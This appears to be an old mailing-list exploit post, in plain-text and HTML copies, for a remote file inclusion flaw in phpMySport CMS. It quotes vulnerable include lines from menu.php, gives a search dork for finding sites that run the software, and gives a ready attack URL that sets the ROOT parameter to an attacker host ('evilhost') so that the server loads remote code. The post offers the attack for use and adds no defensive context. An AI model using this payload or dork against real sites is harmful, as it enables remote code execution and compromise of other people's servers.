phpmysport-rfi.txt

`------=_Part_13450_9048419.1173540747323  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
Application : phpMySport CMS  
  
URL : http://phpmysport.sourceforge.net/en/  
  
Variable menu.php  
  
include_once(ROOT."/team/sql_team.php");  
include_once(ROOT."/team/tpl_team.php");  
include_once(ROOT."/team/lg_team_".LANG.".php");  
include(ROOT."/team/team_list.php");  
  
  
Exploit:  
~~~~~~~~  
  
dork: "phpMySport"  
  
http://www.vuln.com/path/menu.php?ROOT=http://evilhost  
  
  
vitux  
  
#[email protected]  
  
------=_Part_13450_9048419.1173540747323  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
Application : phpMySport CMS<br><br>URL : <a href="http://phpmysport.sourceforge.net/en/">http://phpmysport.sourceforge.net/en/</a><br><br>Variable menu.php<br><br>include_once(ROOT."/team/sql_team.php");<br>include_once(ROOT."/team/tpl_team.php");  
<br>include_once(ROOT."/team/lg_team_".LANG.".php");<br>include(ROOT."/team/team_list.php");<br><br>&nbsp;<br>Exploit:<br>~~~~~~~~<br><br>dork: "phpMySport"<br><br><a href="http://www.vuln.com/path/menu.php?ROOT=http://evilhost">  
http://www.vuln.com/path/menu.php?ROOT=http://evilhost</a><br><br><br>vitux<br>&nbsp;<br>#vitux.manis@<a href="http://gmail.com">gmail.com</a>  
  
------=_Part_13450_9048419.1173540747323--  
`